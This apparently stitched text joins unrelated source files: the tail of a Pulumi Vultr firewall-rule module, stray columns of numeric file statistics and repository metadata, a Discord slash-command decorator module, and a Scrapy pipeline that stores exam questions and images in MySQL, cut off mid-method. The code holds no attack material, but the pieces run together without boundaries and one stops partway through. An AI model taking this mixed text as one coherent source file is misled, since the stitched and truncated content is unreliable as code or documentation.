Provides a Vultr Firewall Rule resource. This can be used to create, read, modify, and delete Firewall rules.
## Example Usage
Create a Firewall Rule
```python
import pulumi
import pulumi_vultr as vultr
my_firewallgroup = vultr.FirewallGroup("myFirewallgroup", description="base firewall")
my_firewallrule = vultr.FirewallRule("myFirewallrule",
firewall_group_id=my_firewallgroup.id,
protocol="tcp",
ip_type="v4",
subnet="0.0.0.0",
subnet_size=0,
port="8090",
notes="my firewall rule")
```
## Import
Firewall Rules can be imported using the Firewall Group `ID` and Firewall Rule `ID`, e.g.
```sh
$ pulumi import vultr:index/firewallRule:FirewallRule my_rule b6a859c5-b299-49dd-8888-b1abbc517d08,1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] firewall_group_id: The firewall group that the firewall rule will belong to.
:param pulumi.Input[str] ip_type: The type of ip for this firewall rule. Possible values (v4, v6) **Note** they must be lowercase
:param pulumi.Input[str] notes: A simple note for a given firewall rule
:param pulumi.Input[str] port: TCP/UDP only. This field can be a specific port or a colon separated port range.
:param pulumi.Input[str] protocol: The type of protocol for this firewall rule. Possible values (icmp, tcp, udp, gre, esp, ah) **Note** they must be lowercase
:param pulumi.Input[str] source: Possible values ("", cloudflare)
:param pulumi.Input[str] subnet: IP address that you want to define for this firewall rule.
:param pulumi.Input[int] subnet_size: The number of bits for the subnet in CIDR notation. Example: 32.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: FirewallRuleArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Vultr Firewall Rule resource. This can be used to create, read, modify, and delete Firewall rules.
## Example Usage
Create a Firewall Rule
```python
import pulumi
import pulumi_vultr as vultr
my_firewallgroup = vultr.FirewallGroup("myFirewallgroup", description="base firewall")
my_firewallrule = vultr.FirewallRule("myFirewallrule",
firewall_group_id=my_firewallgroup.id,
protocol="tcp",
ip_type="v4",
subnet="0.0.0.0",
subnet_size=0,
port="8090",
notes="my firewall rule")
```
## Import
Firewall Rules can be imported using the Firewall Group `ID` and Firewall Rule `ID`, e.g.
```sh
$ pulumi import vultr:index/firewallRule:FirewallRule my_rule b6a859c5-b299-49dd-8888-b1abbc517d08,1
```
:param str resource_name: The name of the resource.
:param FirewallRuleArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(FirewallRuleArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
firewall_group_id: Optional[pulumi.Input[str]] = None,
ip_type: Optional[pulumi.Input[str]] = None,
notes: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[str]] = None,
protocol: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[str]] = None,
subnet: Optional[pulumi.Input[str]] = None,
subnet_size: Optional[pulumi.Input[int]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = FirewallRuleArgs.__new__(FirewallRuleArgs)
if firewall_group_id is None and not opts.urn:
raise TypeError("Missing required property 'firewall_group_id'")
__props__.__dict__["firewall_group_id"] = firewall_group_id
if ip_type is None and not opts.urn:
raise TypeError("Missing required property 'ip_type'")
__props__.__dict__["ip_type"] = ip_type
__props__.__dict__["notes"] = notes
__props__.__dict__["port"] = port
if protocol is None and not opts.urn:
raise TypeError("Missing required property 'protocol'")
__props__.__dict__["protocol"] = protocol
__props__.__dict__["source"] = source
if subnet is None and not opts.urn:
raise TypeError("Missing required property 'subnet'")
__props__.__dict__["subnet"] = subnet
if subnet_size is None and not opts.urn:
raise TypeError("Missing required property 'subnet_size'")
__props__.__dict__["subnet_size"] = subnet_size
super(FirewallRule, __self__).__init__(
'vultr:index/firewallRule:FirewallRule',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
firewall_group_id: Optional[pulumi.Input[str]] = None,
ip_type: Optional[pulumi.Input[str]] = None,
notes: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[str]] = None,
protocol: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[str]] = None,
subnet: Optional[pulumi.Input[str]] = None,
subnet_size: Optional[pulumi.Input[int]] = None) -> 'FirewallRule':
"""
Get an existing FirewallRule resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] firewall_group_id: The firewall group that the firewall rule will belong to.
:param pulumi.Input[str] ip_type: The type of ip for this firewall rule. Possible values (v4, v6) **Note** they must be lowercase
:param pulumi.Input[str] notes: A simple note for a given firewall rule
:param pulumi.Input[str] port: TCP/UDP only. This field can be a specific port or a colon separated port range.
:param pulumi.Input[str] protocol: The type of protocol for this firewall rule. Possible values (icmp, tcp, udp, gre, esp, ah) **Note** they must be lowercase
:param pulumi.Input[str] source: Possible values ("", cloudflare)
:param pulumi.Input[str] subnet: IP address that you want to define for this firewall rule.
:param pulumi.Input[int] subnet_size: The number of bits for the subnet in CIDR notation. Example: 32.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _FirewallRuleState.__new__(_FirewallRuleState)
__props__.__dict__["firewall_group_id"] = firewall_group_id
__props__.__dict__["ip_type"] = ip_type
__props__.__dict__["notes"] = notes
__props__.__dict__["port"] = port
__props__.__dict__["protocol"] = protocol
__props__.__dict__["source"] = source
__props__.__dict__["subnet"] = subnet
__props__.__dict__["subnet_size"] = subnet_size
return FirewallRule(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="firewallGroupId")
def firewall_group_id(self) -> pulumi.Output[str]:
"""
The firewall group that the firewall rule will belong to.
"""
return pulumi.get(self, "firewall_group_id")
@property
@pulumi.getter(name="ipType")
def ip_type(self) -> pulumi.Output[str]:
"""
The type of ip for this firewall rule. Possible values (v4, v6) **Note** they must be lowercase
"""
return pulumi.get(self, "ip_type")
@property
@pulumi.getter
def notes(self) -> pulumi.Output[Optional[str]]:
"""
A simple note for a given firewall rule
"""
return pulumi.get(self, "notes")
@property
@pulumi.getter
def port(self) -> pulumi.Output[Optional[str]]:
"""
TCP/UDP only. This field can be a specific port or a colon separated port range.
"""
return pulumi.get(self, "port")
@property
@pulumi.getter
def protocol(self) -> pulumi.Output[str]:
"""
The type of protocol for this firewall rule. Possible values (icmp, tcp, udp, gre, esp, ah) **Note** they must be lowercase
"""
return pulumi.get(self, "protocol")
@property
@pulumi.getter
def source(self) -> pulumi.Output[Optional[str]]:
"""
Possible values ("", cloudflare)
"""
return pulumi.get(self, "source")
@property
@pulumi.getter
def subnet(self) -> pulumi.Output[str]:
"""
IP address that you want to define for this firewall rule.
"""
return pulumi.get(self, "subnet")
@property
@pulumi.getter(name="subnetSize")
def subnet_size(self) -> pulumi.Output[int]:
"""
The number of bits for the subnet in CIDR notation. Example: 32.
"""
return pulumi.get(self, "subnet_size")
| 40.708955
| 166
| 0.622777
| 2,674
| 21,820
| 4.901272
| 0.075168
| 0.090646
| 0.099344
| 0.08561
| 0.869831
| 0.839768
| 0.81848
| 0.788952
| 0.770563
| 0.753853
| 0
| 0.005715
| 0.270211
| 21,820
| 535
| 167
| 40.785047
| 0.81732
| 0.342026
| 0
| 0.693878
| 1
| 0
| 0.083755
| 0.002838
| 0
| 0
| 0
| 0
| 0
| 1
| 0.159864
| false
| 0.003401
| 0.017007
| 0
| 0.272109
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
337e44854f818ed5a728b6973405dd69567e7602
| 2,027
|
py
|
Python
|
pyslash/decorators.py
|
starsflower/discordpy-slash-commands
|
ec72d2b24c369ba40a0f5c07c7959ba00dc4ded7
|
[
"MIT"
] | 1
|
2021-05-10T14:00:40.000Z
|
2021-05-10T14:00:40.000Z
|
pyslash/decorators.py
|
amcwb/discordpy-slash-commands
|
ec72d2b24c369ba40a0f5c07c7959ba00dc4ded7
|
[
"MIT"
] | 1
|
2021-10-31T06:53:48.000Z
|
2021-11-04T19:51:31.000Z
|
pyslash/decorators.py
|
amcwb/discordpy-slash-commands
|
ec72d2b24c369ba40a0f5c07c7959ba00dc4ded7
|
[
"MIT"
] | null | null | null |
from typing import List
from discord_slash import SlashCommand, cog_ext
from .converters import convert
from .utils import *
def slash_cog(name: str = None, description: str = None, guild_ids: List[int] = None, remove_underscore_keywords: bool = True):
"""
Add a command to a cog
Parameters
----------
name : str, optional
The name of the command, by default None
description : str, optional
The description, by default None
guild_ids : List[int], optional
The guild IDs to add the command to, by default None
remove_underscore_keywords : bool, optional
Whether to remove _ from the end of arguments that would be keywords,
by default True
"""
def decorator(function):
# Use annotations
params, converter_params = get_slash_kwargs(
function, name, description, guild_ids, remove_underscore_keywords)
return cog_ext.cog_slash(**params)(convert(**converter_params)(function))
return decorator
def slash(slash_class: SlashCommand, name: str = None, description: str = None, guild_ids: List[int] = None, remove_underscore_keywords: bool = True):
"""
Add a command to a bot at the top level
Parameters
----------
slash_class : SlashCommand
The slash object to add this command to
name : str, optional
The name of the command, by default None
description : str, optional
The description, by default None
guild_ids : List[int], optional
The guild IDs to add the command to, by default None
remove_underscore_keywords : bool, optional
Whether to remove _ from the end of arguments that would be keywords,
by default True
"""
def decorator(function):
# Use annotations
params, converter_params = get_slash_kwargs(
function, name, description, guild_ids, remove_underscore_keywords)
return slash_class.slash(**params)(convert(**converter_params)(function))
return decorator
| 33.783333
| 150
| 0.680316
| 258
| 2,027
| 5.205426
| 0.22093
| 0.047655
| 0.107223
| 0.047655
| 0.810127
| 0.810127
| 0.810127
| 0.810127
| 0.726731
| 0.726731
| 0
| 0
| 0.246177
| 2,027
| 59
| 151
| 34.355932
| 0.878927
| 0.457819
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0
| 0.75
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
33828d9e622c6cbdd530c2099452e50b75b55fdb
| 40,940
|
py
|
Python
|
rkpass/pipelines.py
|
windowshappy/python
|
02b43b657a284b2db300ce7d7862e5032c688b1d
|
[
"MIT"
] | 10
|
2019-01-17T15:09:01.000Z
|
2022-03-01T06:19:22.000Z
|
rkpass/pipelines.py
|
windowshappy/python
|
02b43b657a284b2db300ce7d7862e5032c688b1d
|
[
"MIT"
] | null | null | null |
rkpass/pipelines.py
|
windowshappy/python
|
02b43b657a284b2db300ce7d7862e5032c688b1d
|
[
"MIT"
] | 6
|
2018-10-29T15:31:50.000Z
|
2020-08-13T08:34:46.000Z
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
import pymysql
import scrapy
import re
from scrapy.exceptions import DropItem
from scrapy.pipelines.images import ImagesPipeline
# 上午题库入库
class RkpassPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# 执行sql语句
self.cursor.execute(insert_sql, tuple(data.values()))
# 提交到数据库执行
self.db.commit()
except:
# 如果发生错误则回滚
self.db.rollback()
return item
# 题目图片下载器
class QuestionImagePipeline(ImagesPipeline):
def file_path(self, request, response=None, info=None):
item = request.meta['item']
url = request.url
file_name = item['field'] + '/' + url.split('/')[-1]
return file_name
def get_media_requests(self, item, info):
if item['questionImg']:
yield scrapy.Request(item['questionImg'], meta={'item': item})
else:
return item
def item_completed(self, results, item, info):
image_path = [x['path'] for ok, x in results if ok]
if not image_path:
# raise DropItem("Item contains no images")
return item
else:
item['questionImg'] = '/storage/images/' + "".join(image_path)
return item
# 选项A图片下载
class OptionAImagePipeline(ImagesPipeline):
def file_path(self, request, response=None, info=None):
item = request.meta['item']
url = request.url
file_name = item['field'] + '/' + url.split('/')[-1]
return file_name
def get_media_requests(self, item, info):
url = "".join(re.findall(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+',
item['optiona']))
if url:
yield scrapy.Request(url, meta={'item': item})
else:
return item
def item_completed(self, results, item, info):
image_path = [x['path'] for ok, x in results if ok]
if not image_path:
# raise DropItem("Item contains no images")
return item
else:
item['optiona'] = 'A.' + '/storage/images/' + "".join(image_path)
return item
# 选项B图片下载
class OptionBImagePipeline(ImagesPipeline):
def file_path(self, request, response=None, info=None):
item = request.meta['item']
url = request.url
file_name = item['field'] + '/' + url.split('/')[-1]
return file_name
def get_media_requests(self, item, info):
url = "".join(re.findall(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+',
item['optionb']))
if url:
yield scrapy.Request(url, meta={'item': item})
else:
return item
def item_completed(self, results, item, info):
image_path = [x['path'] for ok, x in results if ok]
if not image_path:
# raise DropItem("Item contains no images")
return item
else:
item['optionb'] = 'B.' + '/storage/images/' + "".join(image_path)
return item
# 选项C图片下载
class OptionCImagePipeline(ImagesPipeline):
def file_path(self, request, response=None, info=None):
item = request.meta['item']
url = request.url
file_name = item['field'] + '/' + url.split('/')[-1]
return file_name
def get_media_requests(self, item, info):
url = "".join(re.findall(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+',
item['optionc']))
if url:
yield scrapy.Request(url, meta={'item': item})
else:
return item
def item_completed(self, results, item, info):
image_path = [x['path'] for ok, x in results if ok]
if not image_path:
# raise DropItem("Item contains no images")
return item
else:
item['optionc'] = 'C.' + '/storage/images/' + "".join(image_path)
return item
# 选项D图片下载
class OptionDImagePipeline(ImagesPipeline):
def file_path(self, request, response=None, info=None):
item = request.meta['item']
url = request.url
file_name = item['field'] + '/' + url.split('/')[-1]
return file_name
def get_media_requests(self, item, info):
url = "".join(re.findall(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+',
item['optiond']))
if url:
yield scrapy.Request(url, meta={'item': item})
else:
return item
def item_completed(self, results, item, info):
image_path = [x['path'] for ok, x in results if ok]
if not image_path:
# raise DropItem("Item contains no images")
return item
else:
item['optiond'] = 'D.' + '/storage/images/' + "".join(image_path)
return item
# 下午题库入库
class AfterPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into afternoon(question, questionImg, optionA, optionB, optionC, optionD, optionE, optionAanswer, optionAanswerImg, optionBanswer, optionBanswerImg, optionCanswer, optionCanswerImg, optionDanswer, optionDanswerImg, optionEanswer, optionEanswerImg, field) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# 执行sql语句
self.cursor.execute(insert_sql, tuple(data.values()))
# 提交到数据库执行
self.db.commit()
except:
# 如果发生错误则回滚
self.db.rollback()
return item
# 题目图片下载器
class AfterQuestionImagePipeline(ImagesPipeline):
def file_path(self, request, response=None, info=None):
item = request.meta['item']
url = request.url
file_name = item['field'] + '/' + url.split('/')[-1]
return file_name
def get_media_requests(self, item, info):
if "".join(item['questionImg']): # 判断题目中是否有图片 有则循环遍历list下载图片 否则直接返回空值
for img_item in item['questionImg']:
yield scrapy.Request(img_item, meta={'item': item})
else:
item['questionImg'] = "".join(item['questionImg']) # 巨坑 list不能直接入库(转成string)
return item
def item_completed(self, results, item, info):
image_path = [x['path'] for ok, x in results if ok]
if not image_path:
# raise DropItem("Item contains no images")
return item
else:
tempimg = '' # 对于题目多图片进行拼接合成一个字符串 (用;区分每一张图片)
for local_img in image_path:
tempimg += '/storage/images/' + local_img + ';'
item['questionImg'] = tempimg
return item
# 问题一图片下载
class optionAanswerImgPipeline(ImagesPipeline):
def file_path(self, request, response=None, info=None):
item = request.meta['item']
url = request.url
file_name = item['field'] + '/' + url.split('/')[-1]
return file_name
def get_media_requests(self, item, info):
if "".join(item['optionAanswerImg']):
for img_item in item['optionAanswerImg']:
yield scrapy.Request(img_item, meta={'item': item})
else:
item['optionAanswerImg'] = "".join(item['optionAanswerImg'])
return item
def item_completed(self, results, item, info):
image_path = [x['path'] for ok, x in results if ok]
if not image_path:
# raise DropItem("Item contains no images")
return item
else:
tempimg = '' # 对于题目多图片进行拼接合成一个字符串 (用;区分每一张图片)
for local_img in image_path:
tempimg += '/storage/images/' + local_img + ';'
item['optionAanswerImg'] = tempimg
return item
# 问题二图片下载
class optionBanswerImgPipeline(ImagesPipeline):
def file_path(self, request, response=None, info=None):
item = request.meta['item']
url = request.url
file_name = item['field'] + '/' + url.split('/')[-1]
return file_name
def get_media_requests(self, item, info):
if "".join(item['optionBanswerImg']):
for img_item in item['optionBanswerImg']:
yield scrapy.Request(img_item, meta={'item': item})
else:
item['optionBanswerImg'] = "".join(item['optionBanswerImg'])
return item
def item_completed(self, results, item, info):
image_path = [x['path'] for ok, x in results if ok]
if not image_path:
# raise DropItem("Item contains no images")
return item
else:
tempimg = '' # 对于题目多图片进行拼接合成一个字符串 (用;区分每一张图片)
for local_img in image_path:
tempimg += '/storage/images/' + local_img + ';'
item['optionBanswerImg'] = tempimg
return item
# 问题三图片下载
class optionCanswerImgPipeline(ImagesPipeline):
def file_path(self, request, response=None, info=None):
item = request.meta['item']
url = request.url
file_name = item['field'] + '/' + url.split('/')[-1]
return file_name
def get_media_requests(self, item, info):
if "".join(item['optionCanswerImg']):
for img_item in item['optionCanswerImg']:
yield scrapy.Request(img_item, meta={'item': item})
else:
item['optionCanswerImg'] = "".join(item['optionCanswerImg'])
return item
def item_completed(self, results, item, info):
image_path = [x['path'] for ok, x in results if ok]
if not image_path:
# raise DropItem("Item contains no images")
return item
else:
tempimg = '' # 对于题目多图片进行拼接合成一个字符串 (用;区分每一张图片)
for local_img in image_path:
tempimg += '/storage/images/' + local_img + ';'
item['optionCanswerImg'] = tempimg
return item
# 问题四图片下载
class optionDanswerImgPipeline(ImagesPipeline):
def file_path(self, request, response=None, info=None):
item = request.meta['item']
url = request.url
file_name = item['field'] + '/' + url.split('/')[-1]
return file_name
def get_media_requests(self, item, info):
if "".join(item['optionDanswerImg']):
for img_item in item['optionDanswerImg']:
yield scrapy.Request(img_item, meta={'item': item})
else:
item['optionDanswerImg'] = "".join(item['optionDanswerImg'])
return item
def item_completed(self, results, item, info):
image_path = [x['path'] for ok, x in results if ok]
if not image_path:
# raise DropItem("Item contains no images")
return item
else:
tempimg = '' # 对于题目多图片进行拼接合成一个字符串 (用;区分每一张图片)
for local_img in image_path:
tempimg += '/storage/images/' + local_img + ';'
item['optionDanswerImg'] = tempimg
return item
# 问题五图片下载
class optionEanswerImgPipeline(ImagesPipeline):
def file_path(self, request, response=None, info=None):
item = request.meta['item']
url = request.url
file_name = item['field'] + '/' + url.split('/')[-1]
return file_name
def get_media_requests(self, item, info):
if "".join(item['optionEanswerImg']):
for img_item in item['optionEanswerImg']:
yield scrapy.Request(img_item, meta={'item': item})
else:
item['optionEanswerImg'] = "".join(item['optionEanswerImg'])
return item
def item_completed(self, results, item, info):
image_path = [x['path'] for ok, x in results if ok]
if not image_path:
# raise DropItem("Item contains no images")
return item
else:
tempimg = '' # 对于题目多图片进行拼接合成一个字符串 (用;区分每一张图片)
for local_img in image_path:
tempimg += '/storage/images/' + local_img + ';'
item['optionEanswerImg'] = tempimg
return item
# 网络工程师上午题库入库
class wlMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into wl_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# 执行sql语句
self.cursor.execute(insert_sql, tuple(data.values()))
# 提交到数据库执行
self.db.commit()
except:
# 如果发生错误则回滚
self.db.rollback()
return item
# 信息系统监理师上午题库入库
class xxMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into xx_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# 执行sql语句
self.cursor.execute(insert_sql, tuple(data.values()))
# 提交到数据库执行
self.db.commit()
except:
# 如果发生错误则回滚
self.db.rollback()
return item
# 数据库系统工程师上午题库入库
class sjkMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into sjk_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# 执行sql语句
self.cursor.execute(insert_sql, tuple(data.values()))
# 提交到数据库执行
self.db.commit()
except:
# 如果发生错误则回滚
self.db.rollback()
return item
# 软件评测师上午题库入库
class rjpcsMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into rjpcs_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# 执行sql语句
self.cursor.execute(insert_sql, tuple(data.values()))
# 提交到数据库执行
self.db.commit()
except:
# 如果发生错误则回滚
self.db.rollback()
return item
# 嵌入式系统设计师上午题库入库
class qrsMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into qrs_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# 执行sql语句
self.cursor.execute(insert_sql, tuple(data.values()))
# 提交到数据库执行
self.db.commit()
except:
# 如果发生错误则回滚
self.db.rollback()
return item
# 电子商务设计师上午题库入库
class dzswMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into dzsw_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# 执行sql语句
self.cursor.execute(insert_sql, tuple(data.values()))
# 提交到数据库执行
self.db.commit()
except:
# 如果发生错误则回滚
self.db.rollback()
return item
# 多媒体应用设计师上午题库入库
class mediaMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into media_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# 执行sql语句
self.cursor.execute(insert_sql, tuple(data.values()))
# 提交到数据库执行
self.db.commit()
except:
# 如果发生错误则回滚
self.db.rollback()
return item
# 信息系统管理工程师上午题库入库
class xxxtMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
